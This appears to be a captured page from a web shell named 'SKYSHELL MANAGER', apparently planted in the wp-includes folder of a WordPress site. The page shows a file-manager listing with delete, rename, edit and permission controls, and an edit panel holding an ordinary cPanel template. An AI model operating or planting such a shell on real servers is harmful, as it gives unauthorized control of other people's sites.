📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: addip.tmpl
[% IF !data.popupbox; PROCESS 'master_templates/_defheader.tmpl' breadcrumburl = '/scripts2/addipform' theme="yui"; END; -%] [% USE Encoder %] [% IF data.status %] <div class="okmsg"> [% ELSE %] <div class="errormsg"> [% END %] [% Encoder.safe_html_encode_str(data.statusmsg) %] </div> <div id="msgs"> [% FOR msg IN data.messages %] <div class="statusmsg">[% Encoder.safe_html_encode_str(msg) %]</div> [% END %] </div> <div id="errs"> [% FOR msg IN data.errors %] <div class="errormsg">[% Encoder.safe_html_encode_str(msg) %]</div> [% END %] </div> [% PROCESS 'master_templates/_deffooter.tmpl' theme="yui" IF !data.popupbox -%]
Save